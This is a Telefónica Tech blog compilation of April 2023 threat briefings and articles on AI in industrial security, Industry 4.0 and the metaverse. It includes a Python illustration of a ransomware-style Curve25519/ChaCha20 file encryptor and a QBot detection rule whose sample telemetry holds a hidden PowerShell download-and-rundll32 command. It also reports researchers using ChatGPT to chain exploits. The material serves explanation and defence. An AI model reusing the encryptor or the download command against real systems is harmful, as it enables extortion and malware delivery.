Cyber Security Weekly Briefing, 22 – 28 April

Telefónica Tech    28 April, 2023

SolarWinds fixes high severity vulnerabilities

In its latest security update, SolarWinds has fixed two high-severity vulnerabilities that could lead to command execution and privilege escalation.

The more serious of the two is CVE-2022-36963 (CVSS 8.8), described as a command injection flaw in the SolarWinds Platform, the company's infrastructure monitoring and management solution.

The second high-severity vulnerability is CVE-2022-47505 (CVSS of 7.8), which refers to a local privilege escalation flaw.

Both vulnerabilities were reported by researchers from the Trend Micro Zero Day Initiative and were fixed in SolarWinds Platform version 2023.2.

In addition, the new release also resolves the medium severity CVE-2022-47509, which could be exploited remotely to append URL parameters and inject HTML code.

Finally, SolarWinds fixed two medium-severity vulnerabilities in Database Performance Analyzer: one that leads to the disclosure of sensitive information and another that allows users to enumerate folders on the server.

More info

RustBucket: New malware targeting macOS users

Researchers at Jamf Threat Labs have discovered a new malware family targeting macOS users in recent attacks that is capable of obtaining additional payloads from its command and control (C&C) server.

The malware, called RustBucket, has been attributed to the North Korean-associated advanced persistent threat (APT) actor BlueNoroff, which is believed to be a subgroup of the notorious Lazarus Group. RustBucket is executed in three stages.

The first stage uses fraudulent domains and social engineering techniques, as well as an unsigned application called Internal PDF Viewer.app that is designed to obtain and execute the stage two payload on the system.

The second stage is a signed application that masquerades under a legitimate-looking Apple bundle identifier. It again contacts the command and control (C&C) server to obtain the stage three payload: a signed trojan written in Rust that runs on both ARM and x86, collects system information (including the list of running processes), checks whether it is running in a virtual machine, and lets the attacker perform several actions on the infected machine.

More info

Critical vulnerabilities in Cisco Industrial Network Director and Modeling Labs

Cisco has released security updates to patch two critical vulnerabilities in its Industrial Network Director and Modeling Labs products.

The first vulnerability, CVE-2023-20036 (CVSS 9.9), is in the Industrial Network Director web interface and would allow an authenticated remote attacker to modify a request and execute arbitrary commands with administrative privileges or access sensitive data.

The second vulnerability, CVE-2023-20154, has a CVSS of 9.1 and resides in the Cisco Modeling Labs external authentication mechanism; it could allow an unauthenticated remote attacker to access the web interface with administrative privileges. It affects only deployments configured with LDAP authentication.

More info

Google receives legal authorization to act against CryptBot

Following the authorization issued by a federal judge in the Southern District of New York on the civil action against the operators of the CryptBot malware, Google has begun to disable the infrastructure related to its distribution.

The complaint targets the largest distributors of CryptBot, allegedly located in Pakistan, and is based on allegations of wire fraud and intellectual property infringement.

The company estimates that this malware has infected more than 670,000 computers in the last year, targeting Google Chrome users to exfiltrate their data.

The court has issued a temporary injunction to prevent the spread of this malware, which allows Google to take action against current and future domains linked to the distribution of CryptBot.

More info

RTM Locker ransomware targets Linux systems

The Uptycs research team has identified a new strain of RTM Locker ransomware targeting Linux operating systems.

It is worth noting that security researchers at Trellix recently published an analysis of the TTPs used by the Read The Manual (RTM) group, a provider of Ransomware as a Service (RaaS).

Since then the group's development has continued, producing this new strain, which targets Linux, NAS and ESXi hosts and is based on the leaked source code of the Babuk ransomware.

It encrypts files with a combination of ECDH on Curve25519 and ChaCha20, then urges victims to contact the group's support via Tox within 48 hours, threatening to publish stolen data if its demands are not met.
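
As an added illustration (not code from the Uptycs analysis or from the malware itself), the following Python sketch shows how a file-encryption scheme combining ECDH on Curve25519 with ChaCha20 is typically put together, and why files cannot be recovered without the operator's private key. X25519 and ChaCha20 are transcribed from RFC 7748 and RFC 8439 in pure Python so the example runs offline; the footer layout (nonce followed by the ephemeral public key), the SHA-256 key derivation and the function names are assumptions for illustration, not details taken from RTM Locker.

```python
import hashlib
import os
import struct

P = 2**255 - 19            # field prime for Curve25519
A24 = 121665               # (A - 2) / 4, constant of the Montgomery ladder
M32 = 0xFFFFFFFF
BASE_POINT = (9).to_bytes(32, "little")

def _clamp(scalar):
    k = bytearray(scalar)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, "little")

def x25519(scalar, u_bytes):
    """X25519 scalar multiplication (RFC 7748 Montgomery ladder)."""
    k = _clamp(scalar)
    x1 = int.from_bytes(u_bytes, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) ** 2 % P
        z3 = x1 * ((da - cb) ** 2) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")

def _rotl(v, n):
    return ((v << n) & M32) | (v >> (32 - n))

def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & M32; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & M32; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & M32; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & M32; s[b] = _rotl(s[b] ^ s[c], 7)

def _chacha20_block(key, counter, nonce):
    """One 64-byte keystream block (RFC 8439): 10 double rounds over the state."""
    init = list(struct.unpack("<16I", b"expand 32-byte k" + key
                              + struct.pack("<I", counter) + nonce))
    s = init[:]
    for _ in range(10):
        for idx in ((0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15),
                    (0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14)):
            _quarter_round(s, *idx)
    return struct.pack("<16I", *[(x + y) & M32 for x, y in zip(s, init)])

def chacha20_xor(key, nonce, data, counter=1):
    """Encrypt or decrypt (same operation) by XORing data with the keystream."""
    out = bytearray()
    for i in range(0, len(data), 64):
        block = _chacha20_block(key, counter + i // 64, nonce)
        out += bytes(x ^ y for x, y in zip(data[i:i + 64], block))
    return bytes(out)

FOOTER_LEN = 12 + 32   # nonce || ephemeral public key (assumed file layout)

def generate_keypair(private=None):
    private = private or os.urandom(32)
    return private, x25519(private, BASE_POINT)

def encrypt_file(operator_public, plaintext):
    """Per-file ephemeral X25519 key, ECDH with the operator's static public key,
    SHA-256 of the shared secret as the ChaCha20 key (assumed KDF)."""
    eph_private, eph_public = generate_keypair()
    key = hashlib.sha256(x25519(eph_private, operator_public)).digest()
    nonce = os.urandom(12)
    ciphertext = chacha20_xor(key, nonce, plaintext)
    # eph_private is dropped here: only the operator's private key can recompute
    # the shared secret from the eph_public stored in the footer.
    return ciphertext + nonce + eph_public

def decrypt_file(operator_private, blob):
    ciphertext, nonce, eph_public = blob[:-FOOTER_LEN], blob[-FOOTER_LEN:-32], blob[-32:]
    key = hashlib.sha256(x25519(operator_private, eph_public)).digest()
    return chacha20_xor(key, nonce, ciphertext)
```

The binary only needs to carry the operator's public key: each file gets a fresh ephemeral key pair, the shared secret is derived, and the ephemeral private key is discarded, so neither the binary nor the encrypted file contains anything from which the ChaCha20 key can be rebuilt. Recovery without the operator's private key therefore means breaking X25519, which is why analysis of such samples concentrates on implementation mistakes (key reuse, weak randomness, keys left in memory) rather than on the cipher itself.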

According to researchers, the threat actor is known to avoid high-profile targets such as critical infrastructure and hospitals, among others, to avoid attracting attention as much as possible.

More info

You are no longer just a company of products or services, you are a data company

Carlos Lorenzo    26 April, 2023

All companies in operation today are actually data companies. This is because, every day they collect and process a large amount of information: from customers, internal operations, suppliers, partners and competitors…

However, many companies are unable to see this data as a highly valuable asset for their business, despite the fact that “data is the most valuable gift of digitalization to business management”.

The data a company collects, and potentially should collect, can be used for very specific actions with direct return, such as:

  • Advanced customer segmentation
  • Churn prediction
  • Predictive maintenance of machines
  • Real-time stock management
  • Pricing optimization…
  • …and much more.

All this is possible with a company’s internal data, but opportunities multiply when we also include other external data sources.

Turning data into valuable assets

Regardless of the sector or area of activity of a company, there are data sources that can offer a really unique value when creating and training algorithmic models to help strategic decision making; this could include meteorological sources, events and work calendars for cities, statistical and demographic data, land registry data and social networks.

If human beings are 70% water, companies are 100% data.

Organizations seeking to remain relevant today are devoting all their efforts to digitally transform themselves, basing their decisions on data with the incorporation of Big Data and Artificial Intelligence technologies.

As if that wasn’t enough, upon solving the challenge of digital transformation that many companies face, they do not find themselves at a competitive advantage, but instead on a level playing field with the rest.

Photo: Stephen Dawson / Unsplash

What really makes a difference is the data you obtain, how you organize it and the strategy for using it. That is the key, and even more so the choice of external data sources that can enrich the information you already have.

In this way, Telco data becomes very important to companies’ corporate strategy. This is due to the large amount of useful information they provide in terms of customer knowledge. 

Business insights: mobility, tourism or retail spaces

At Telefónica Tech we understand and classify our Telco data, which we can provide to our customers in an aggregated and anonymized manner, as business insights that reveal behavioral patterns and help them better understand their customers' needs.

In this sense, we offer our clients solutions based on their business requirements:

  • We offer Crowd Analytics services that present behavioral patterns of mobility between different locations and cities, and even inside retail locations.
  • We also provide Consent-based data services that facilitate the interaction between brands and their consumers.
  • We also offer analytics for fleet management through our IoT services.
  • In-depth knowledge of communications between branches and call centers through our Communications solution.

Brands have to bet on new ways of approaching their consumers, which means focusing their efforts on getting to know them better and adapting to their needs and new demands. New technologies play a fundamental role in this.

Featured photo: Joel Filipe / Unsplash

Artificial Intelligence applied to industrial Cyber Security (OT)

Jorge Rubio    25 April, 2023

Cyber Security in industrial or OT (Operational Technology) environments is crucial to protect critical infrastructures such as energy, transport and communication and has become an increasing concern as they become more interconnected and dependent on IT (Information Technology).

Different companies and organisations in various industrial environments have suffered from both technical and social engineering attacks over the years, which have become increasingly sophisticated and in greater volume.

Therefore, Artificial Intelligence (AI) could be the key to improving the ability of organisations to detect and prevent cyber-attacks in this type of industry, i.e., to make a qualitative leap in terms of the Cyber Security of OT systems.

How can Artificial Intelligence help improve industrial Cyber Security?

These new AI technologies may be able to detect and respond to security threats more effectively than traditional Cyber Security methods.

The following are some of the applications that Artificial Intelligence can have in the present and future of industrial systems:

  • Monitoring and optimisation of industrial processes to predict maintenance needs and avoid future equipment problems, which would lead to unscheduled production downtime and, in turn, large losses for companies.
  • The automation of security tasks, such as network monitoring, security patching, creating and updating firewall rules, helping security analysts to focus on more complex tasks.
Operator using new technologies in a factory. Shalom de León / Unsplash

Industrial Cyber Security event monitoring tools already have capabilities for learning the behaviour of network communications, and it is foreseeable that these capabilities will be integrated with those provided by Artificial Intelligence.

Staff workloads also mean that they are unable to comprehensively examine all incidents reported over time.

It is therefore difficult to envisage a future in which Artificial Intelligence does not play a key role in responding to industrial cyber-attacks and improving operational efficiency.

The challenges of applying Artificial Intelligence in Cyber Security OT

One of the biggest challenges today is to create safe, sustainable and responsible Artificial Intelligence for all, but it is not the only challenge.

The following are some of the challenges that can be created by the application of AI in industrial Cyber Security solutions:

  1. The quality and availability of the training data needed (e.g., network traffic captures or PCAP files), constrained by the need to keep each company’s internal information private and secure.
  2. The difficulty of interpreting Artificial Intelligence models and integrating them into Cyber Security applications.
  3. The possible overload of alerts, or missed threats, caused by a large number of false positives or false negatives when Artificial Intelligence is misapplied.
  4. The difficulty of identifying changes in industrial processes without the intervention of the people in charge (operators).
  5. The possibility that algorithms can be fooled or manipulated by attackers.
  6. The high market cost of AI-driven tools.
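
The behaviour-learning approach mentioned above, together with two of these challenges (alert noise from a badly tuned model, and process changes that need an operator in the loop), can be made concrete with a small example. The following Python is an added illustration, not code from any vendor's product: it learns, from a clean window of Modbus/TCP requests, which hosts talk to which PLC with which function codes and at what rate, then flags deviations. The Modbus function codes are real; the hosts, addresses and traffic are constructed, and the 60-second bucket and the x3 rate threshold are arbitrary assumptions.

```python
from collections import defaultdict

# Real Modbus/TCP function codes; hosts, addresses and traffic below are constructed.
READ_HOLDING_REGISTERS = 3
WRITE_MULTIPLE_REGISTERS = 16
BUCKET_SECONDS = 60          # assumed rate window
HMI, EWS, PLC, ROGUE = "10.0.0.5", "10.0.0.7", "10.0.0.20", "10.0.0.99"


def learn_baseline(records):
    """records: iterable of (ts, src, dst, dport, func).
    Returns {conversation: {"funcs": codes seen, "peak": max requests per bucket}}."""
    funcs = defaultdict(set)
    buckets = defaultdict(lambda: defaultdict(int))
    for ts, src, dst, dport, func in records:
        key = (src, dst, dport)
        funcs[key].add(func)
        buckets[key][ts // BUCKET_SECONDS] += 1
    return {k: {"funcs": funcs[k], "peak": max(buckets[k].values())} for k in funcs}


def approve_change(baseline, src, dst, dport, func):
    """Operator-confirmed process change: extend the baseline instead of
    re-learning it blindly, so a human stays in the loop for legitimate changes."""
    entry = baseline.setdefault((src, dst, dport), {"funcs": set(), "peak": 1})
    entry["funcs"].add(func)


def detect(records, baseline, rate_factor=3):
    """Flag conversations never seen, function codes a host never used, and
    request bursts above rate_factor x the learned peak (one alert per bucket)."""
    alerts, flagged = [], set()
    counts = defaultdict(lambda: defaultdict(int))
    for ts, src, dst, dport, func in records:
        key = (src, dst, dport)
        if key not in baseline:
            alerts.append((ts, "new-conversation", key, func))
            continue
        if func not in baseline[key]["funcs"]:
            alerts.append((ts, "new-function", key, func))
        bucket = ts // BUCKET_SECONDS
        counts[key][bucket] += 1
        if (counts[key][bucket] > rate_factor * baseline[key]["peak"]
                and (key, bucket) not in flagged):
            flagged.add((key, bucket))
            alerts.append((ts, "rate-spike", key, func))
    return alerts


def _polls(src, start, n, period, func):
    return [(start + i * period, src, PLC, 502, func) for i in range(n)]


# Learning window (600 s): the HMI reads every 2 s; the engineering station
# reads every 30 s and writes once.
LEARNING = (_polls(HMI, 0, 300, 2, READ_HOLDING_REGISTERS)
            + _polls(EWS, 0, 20, 30, READ_HOLDING_REGISTERS)
            + [(100, EWS, PLC, 502, WRITE_MULTIPLE_REGISTERS)])

# Detection window: normal HMI polling, then three things the model should
# notice: the HMI writing registers for the first time, an unknown host
# talking to the PLC, and 30 reads in 30 s from the engineering station
# (ten times its learned peak).
DETECTION = (_polls(HMI, 1000, 30, 2, READ_HOLDING_REGISTERS)
             + [(1010, HMI, PLC, 502, WRITE_MULTIPLE_REGISTERS),
                (1020, ROGUE, PLC, 502, READ_HOLDING_REGISTERS)]
             + _polls(EWS, 1100, 30, 1, READ_HOLDING_REGISTERS))

if __name__ == "__main__":
    baseline = learn_baseline(LEARNING)
    for alert in detect(DETECTION, baseline):
        print(alert)
```

The rate threshold and the one-alert-per-bucket rule are what keep challenge 3 in check: without them a single burst would produce dozens of alerts for one event. approve_change is the answer to challenge 4: when the engineering team legitimately starts writing registers from the HMI, an operator confirms the change and the baseline is extended, rather than the model silently relearning whatever it currently sees.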

Concerns about the possible misuse of Artificial Intelligence and machine learning in this field of industrial Cyber Security would also require appropriate regulation.

Jeshoots / Unsplash

On the other hand, attempts could be made to use AI to defeat industrial Cyber Security defences by augmenting attackers’ existing knowledge.

A well-known example comes from a Pwn2Own contest organised by the Zero Day Initiative, in which two researchers won by disrupting and taking control of industrial systems with the help of ChatGPT. The researchers found several weaknesses in the target systems and used the AI to help them write the code that chained the vulnerabilities together, saving hours of development time.

While it is true that OpenAI and other companies with AI bots are adding controls and filters to prevent such malicious use, there is still some way to go before these technologies are considered completely safe from malicious actors.

The relevance of AI in industrial Cyber Security

As information and communication technologies continue to evolve and become even more integrated into critical infrastructures, the risk of cyber-attacks will continue to increase and therefore the solutions currently in use in the OT world need to be improved.

The future of Artificial Intelligence applied to industrial Cyber Security could be very promising, as these solutions could significantly improve the ability of organisations to detect patterns of abnormal behaviour and alert operators to potential threats.

In addition, Artificial Intelligence could also be used to predict the risk of an attack and provide recommendations to mitigate the risk before it occurs. AI can also strengthen authentication and authorisation of access to critical systems, as well as identify vulnerabilities in OT systems before they are exploited by attackers.

In conclusion, the use of Artificial Intelligence in industrial Cyber Security may be the key to protecting our critical infrastructures in an increasingly connected world.

Featured photo: DeepMind / Unsplash

Cyber Security Weekly Briefing, 15 – 21 April

Telefónica Tech    21 April, 2023

Google fixes two new actively exploited 0-day vulnerabilities

Google has issued new security advisories for two 0-day vulnerabilities in the Chrome browser that are being actively exploited.

The first, CVE-2023-2033, is a type confusion flaw in Chrome’s V8 JavaScript engine that could allow a remote attacker to exploit it via a specially crafted HTML page.

The second, CVE-2023-2136, is an integer overflow in Skia, the cross-platform 2D graphics library, and if exploited could lead to incorrect graphics rendering, memory corruption or remote code execution resulting in unauthorised system access.

More info

LockBit samples found targeting macOS systems

MalwareHunterTeam has found LockBit samples built to infect multiple operating systems, including, for the first time, Apple’s macOS.

MalwareHunterTeam highlights that this is a remarkable milestone as it is also the first time that one of the major ransomware groups has been known to create malware specifically targeting macOS.

The samples include an encryptor called ‘locker_Apple_M1_64’ for newer Apple Silicon devices and another for PowerPC CPUs, used by older Macs.

In-depth analysis shows that, so far, this is an early version of the LockBit strain that could not be used in a real attack, but it signals the group’s interest in attacking macOS devices in the near future.

More info

New QBot campaign identified

Security researchers have published an analysis of the TTPs used in a new campaign of the well-known Qbot malware, which now attacks victims through the use of PDF files and Windows Script Files (WSF).

This phishing campaign is distributed via emails that reuse legitimate email threads and carry an attached PDF which, when opened, downloads a ZIP file containing a WSF file. The WSF file in turn runs a PowerShell script that attempts to download the QBot DLL.
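
The chain described above can be turned into a detection rule on process-creation telemetry. The following Python is an added example, not code from the referenced analysis: it flags powershell.exe launched by wscript.exe or cscript.exe when enough traits of the chain are present (a .wsf argument on the script host, a download cmdlet, a hidden or encoded command, and a DLL being written or loaded via rundll32/regsvr32). The event format, the field names and the sample telemetry (including the 192.0.2.10 documentation address and the file names) are constructed for the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style; fields assumed)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOADERS = {"rundll32.exe", "regsvr32.exe"}
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient|"
    r"start-bitstransfer|\bcurl\b|\bwget\b", re.I)
STEALTH_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s", re.I)
DLL_RE = re.compile(r"\.dll\b", re.I)


def _name(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_wsf_powershell_chain(events, min_indicators=2):
    """Return one alert per powershell.exe spawned by a script host that shows
    at least min_indicators traits of the WSF -> PowerShell -> DLL chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if _name(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _name(parent.image) not in SCRIPT_HOSTS:
            continue
        indicators = []
        if ".wsf" in parent.cmdline.lower():
            indicators.append("wsf-parent")
        if DOWNLOAD_RE.search(e.cmdline):
            indicators.append("download-cmdlet")
        if STEALTH_RE.search(e.cmdline):
            indicators.append("hidden-or-encoded")
        loads_dll = DLL_RE.search(e.cmdline) or any(
            c.ppid == e.pid and _name(c.image) in LOADERS for c in events)
        if loads_dll:
            indicators.append("dll-load")
        if len(indicators) >= min_indicators:
            alerts.append({"pid": e.pid, "parent_cmdline": parent.cmdline,
                           "cmdline": e.cmdline, "indicators": indicators})
    return alerts


# Constructed sample telemetry (not from a real incident): the malicious chain
# explorer.exe -> wscript.exe <x>.wsf -> powershell.exe -> rundll32.exe, plus
# two benign PowerShell launches. 192.0.2.10 is a documentation address.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user\Downloads\Document\Document.wsf"'),
    ProcEvent(300, 200, PS,
              r'powershell.exe -nop -w hidden -c "iwr http://192.0.2.10/img.png '
              r'-OutFile $env:TEMP\upd.dll; rundll32 $env:TEMP\upd.dll,print"'),
    ProcEvent(400, 300, r"C:\Windows\System32\rundll32.exe",
              r"rundll32 C:\Users\user\AppData\Local\Temp\upd.dll,print"),
    ProcEvent(500, 100, PS, "powershell.exe -c Get-ChildItem"),
    ProcEvent(600, 100, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Scripts\logon.vbs"),
    ProcEvent(700, 600, PS, "powershell.exe -c Get-Date"),
]

if __name__ == "__main__":
    for alert in detect_wsf_powershell_chain(SAMPLE_EVENTS):
        print(alert)
```

Requiring two or more indicators keeps a logon script that merely runs `powershell -c Get-Date` out of the alert queue while still catching the campaign's chain. In a real pipeline the same function would run over Sysmon Event ID 1 or EDR process events, and a second rule would watch for the preceding step (a PDF reader or browser writing a ZIP that contains a .wsf).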

It is worth noting that numerous actors such as BlackBasta, REvil, PwndLocker, Egregor, ProLock and MegaCortex have used Qbot for initial access to corporate networks.

Once QBot is running, it deploys additional payloads such as Cobalt Strike, Brute Ratel and other malware that give the operators access to the compromised device.

More info

New PoC enables VM2 sandbox bypassing

Security researchers have released a new PoC capable of bypassing the VM2 sandbox, widely used in the development and security world to run and test untrusted code in an isolated environment.

The bypass allows untrusted code to escape the constraints of the sandbox environment and run on the host. The first vulnerability, CVE-2023-29017, was identified a fortnight ago; the two most recent are CVE-2023-29199 and CVE-2023-30547.

The latter, with a CVSS of 9.8, stems from a sanitisation flaw that lets an attacker raise an unsanitised host exception inside handleException() and use it to escape the sandbox.

Users are advised to fix the vulnerability by upgrading to version 3.9.17 as soon as possible to avoid a potential security incident.

More info

Critical Vulnerabilities in Alibaba Cloud PostgreSQL Databases

Security researchers at Wiz have published a report disclosing two critical vulnerabilities in Alibaba Cloud’s PostgreSQL database services.

According to the researchers, these flaws allowed unauthorised access to Alibaba Cloud customers’ PostgreSQL databases, which could lead to a supply chain attack and remote code execution.

It should be noted that the vulnerabilities, which have been named BrokenSesame, were reported to Alibaba Cloud in December 2022, who deployed mitigations on 12 April, although there is no evidence of exploitation.

In short, one flaw allows privilege escalation in AnalyticDB and the other remote code execution in ApsaraDB RDS.

More info

Featured photo: Clark van der Beken / Unsplash

Industrial digitalization: we share the keys at Advanced Factories

Nacho Palou    20 April, 2023

This week we are at Advanced Factories, the annual reference meeting on innovation and industrial automation, robotics, and digitalized industry or Industry 4.0.

At Telefónica Tech, we are sharing our knowledge and experience, and showcasing technologies that enable process automation and digitalization in the industrial sector, driving efficiency and productivity.

“Industry 4.0 consists of integrating technology into the process to produce more and better at lower costs.” —Darío Cesena, Geprom part of Telefónica Tech.

To demonstrate how new generation digital technologies improve industrial competitiveness and how they are applied in the sector, at Advanced Factories we have four demos that incorporate our main enabling technologies of Industry 4.0:

  • IoT sensors to collect real-time data.
  • 5G and NB-IoT connectivity to provide high-speed and ultra-low latency connection.
  • Cloud and Edge Computing to store and process large amounts of data.
  • Industrial management software and data analytics to optimize process management.
  • Big Data and Artificial Intelligence to obtain insights and improve efficiency.
  • Cyber Security to protect the entire industrial process.

Our interactive demos at Advanced Factories

1. Smart Lego Factory, an intelligent process factory


Adapted to an event context, we built a process factory with Lego. Process factories produce goods that cannot be broken down into their elements. This would be the case, for example, with detergent or soda.

  • These types of factories have highly automated processes.
  • They generate lots of data. Capturing and processing it allows process improvement, cost savings, and increased efficiency and profitability.

The Smart Lego Factory demo allows visitors to see and interact with our IoT/MoM Legato platform for manufacturing process management (MES). Legato provides real-time information about factory performance.

  • This solution makes it possible to know any parameter, both in the production process and in the business layer, as long as that process is sensorized, generates data and is connected.

2. Fab Lab 4.0, a smart factory for discrete manufacturing


Also with a scale model, we showed our visitors how to apply our knowledge and technology to a discrete manufacturing process. This is the type of factory that combines different parts to achieve the final product, such as a car or toy factory.

  • In these factories operators, who hold the process knowledge, are usually more involved than machines, which generates less data.
  • In this case, our MES/SGA Objective platform does not focus as much on data capture as on guiding the operator and monitoring the process. It also monitors the parts used, and the final result.

For this scenario, we have a small toy helicopter factory at the stand that visitors can assemble following the instructions on a screen.

At the same time, MES software tracks the steps and parts used. Upon completing the assembly, the MES software assigns a serial number to each finished toy to ensure traceability of the final product: who assembled it and when, how long it took, what parts were used, etc.

  • Blockchain would add an additional guarantee of authenticity and immutability of that information.
  • In this demo, the Legato software controls the production, monitoring in real time and making decisions to improve the efficiency and quality of the manufacturing process.

3. Connected preventative safety with Livall smart helmets


At our booth, we also have a connected worker helmet. It is based on the same approach as Livall’s connected helmets for motorcyclists or cyclists.

  • For use in industrial environments, the helmet is equipped with sensors that measure air quality and ambient temperature. It also has an accelerometer to detect impacts and sudden movements.
  • Thanks to these sensors, Livall’s helmet can anticipate industrial risks such as environmental toxins or poor air quality.
  • In addition, it can alert in case of detecting impacts or falls of the worker.

The NB-IoT connectivity of the Livall helmet allows its use in large facilities such as a mine or a petrochemical plant.

  • The data generated by the helmet is sent anonymized to a platform that processes it; for example, to activate safety measures.

4. Spot, the 5G-connected ‘robot dog’ for industrial environments monitoring


Spot, the ‘robot dog’ by Boston Dynamics, is the perfect example of the possibilities offered by self-piloted robotics in the industrial sector.

The Alisys unit that accompanies us these days at Advanced Factories incorporates 5G connectivity to communicate with our Edge Computing solution.

  • Besides remote control, 5G connectivity allows the data captured by Spot’s onboard sensors (a thermal camera and a 360-degree camera) to be streamed, and a robotic arm to be controlled.

In self-piloted robotics, such as automatic guided vehicles or AGVs, drones, or other machinery, 5G connectivity provides:

  • Ultra-low latency, almost imperceptible, essential for the robot to move and interact with the environment in real time.
  • High capacity to transmit and process data, such as images captured by cameras.

For the industrial sector, we are already defining use cases for self-piloted robots like Spot. Although not directly related to production processes, they have real applications in factories:

  1. In a large car factory, Spot can inspect the facilities, looking for thermal differences or identifying objects.
  2. In a waste processing and recycling center, Spot can identify health risks in the area where the raw material (waste) is stored, such as toxic gases or hazardous materials.

The same technologies that enable Spot (5G connectivity with network slicing, Edge Computing, sensorization) can also be applied to other purposes: logistics, surveillance, or goods movement. Other self-piloted robots, such as drones or AGVs, can also benefit from these technologies.

The knowledge and experience of our experts and clients

At Advanced Factories our experts and customers also give lectures and talks, sharing their experiences and projects first hand:

Comprehensive digitization of production processes applying Artificial Intelligence: The case of Stolt Sea Farm

Darío Cesena (Geprom part of Telefónica Tech) and Jorge Juan Alfonso (Stolt Sea Farm)

Darío Cesena (Geprom part of Telefónica Tech) and Jorge Juan Alfonso (Stolt Sea Farm) spoke about aquaculture farm digitization. They highlighted how data is changing industrial manufacturing to increase productivity, meet customer demands, and better manage operational processes.

“A company’s data is another asset,” says Darío Cesena, Geprom part of Telefónica Tech.

To achieve this, it is necessary to collect and analyze information. Artificial Intelligence models allow for insights and optimizing production, as we do in Stolt Sea Farm’s aquaculture farms.

By applying connectivity solutions, Artificial Intelligence, Big Data, and Cyber Security, which make industrial processes more efficient, Stolt can also predict supply and demand for its products. This is especially important considering that some species take years to reach their desired size.

Stolt provides “quality service and products to its customers while also promoting innovation in its own activity and in the food sector,” explained Jorge Juan Alfonso, Food Operations Manager at Stolt Sea Farm.

The intelligent helmet for preventive safety management of industry workers

Alfredo Serret (left) from Telefónica Tech and Manu Marín from Livall

Alfredo Serret (Telefónica Tech) and Manu Marín (Livall) talked about connected helmets in the industrial sector. Marín took a few minutes to discuss the beginnings and motivations of Livall, a platform built to “put the benefits of intelligent mobility at the service of people.”

From that idea other variants and applications emerged, such as a helmet for skiers and the connected helmet designed for accident prevention, which we showed at our Advanced Factories stand.

Although the helmet aims to provide “preventive safety to avoid accidents,” it “also can sensorize a factory, saving large costs,” explained Marín.

“The digitalization of the industry benefits the people at the center of the process as well.” – Alfredo Serret, Telefónica Tech.

Both participants agreed that Livall’s industrial helmet has many possibilities and use cases for the digitalization of the industry to also benefit “the people who are at the center of industrial processes,” explained Alfredo Serret.

Quality and maintenance: A leap in competitiveness supported by technology

Javier Martínez Borreguero (Telefónica Tech)


Javier Martínez Borreguero (Telefónica Tech) participated in a roundtable discussion on predictive maintenance with Artificial Intelligence. Borreguero listed some benefits of industry digitalization:

  • Resilience.
  • Sustainability and positive impact.
  • New business models.

“In the next five years, 95% of quality and maintenance management processes in the industry will incorporate Artificial Intelligence and massive connectivity,” he added.

These are available technologies that we can incorporate into the industrial sector to tackle challenges in quality and maintenance management.

“5G connectivity and Artificial Intelligence are realities. They are available technologies. The question is: are they integrated into your production processes?” – Javier Martínez Borreguero, Telefónica Tech.

Turn-key solutions for Industry 4.0

At Advanced Factories we share our complete vision of a digitized factory, end-to-end: from the entry of raw materials to the exit of the final product.

5G connectivity, Cloud, Cyber Security, Big Data or Artificial Intelligence models, among other enabling technologies, allow us to address any need across the entire spectrum, from the factory floor to data analysis.

Further, we develop digitalization projects that connect factory software with business layers using our industrial knowledge and sensorization. As a result, we can provide customized solutions to meet the needs of each customer.

Metaverse (II): the challenge of building a virtual space that is secure, inclusive and beneficial to everyone

Estevenson Solano    19 April, 2023

As we learned in the previous article of this series, the impact of the metaverse on disinformation, child safety, its evolution and its potential to spread discrimination and inequalities will depend on how the technology is developed, regulated and used by individuals and organisations.

Many uncertainties remain: Will the metaverse produce misinformation, will children be safe from inappropriate content, will games and pornography drive its evolution, and will it increase discrimination and inequalities?

We don’t know, but it is important to address some issues proactively to ensure that the metaverse is a safe, inclusive and beneficial space for all:

  • The metaverse can create new opportunities for the spread of disinformation and fake news, especially in virtual social environments where people interact and share information. However, it may also offer new tools and techniques for verifying information, checking facts and combating disinformation.
  • Child safety faces new risks and challenges, especially in terms of inappropriate content, cyber-bullying and online grooming. However, the metaverse is also likely to offer new tools and techniques to protect children, such as virtual safety filters, parental controls and moderation tools.
  • As for the evolution of the metaverse, it is likely that gaming and pornography will continue to drive its development, given the popularity of these industries and their current presence in virtual environments. However, other industries and applications, such as education, healthcare and business, are also likely to emerge and could shape the metaverse in different ways.
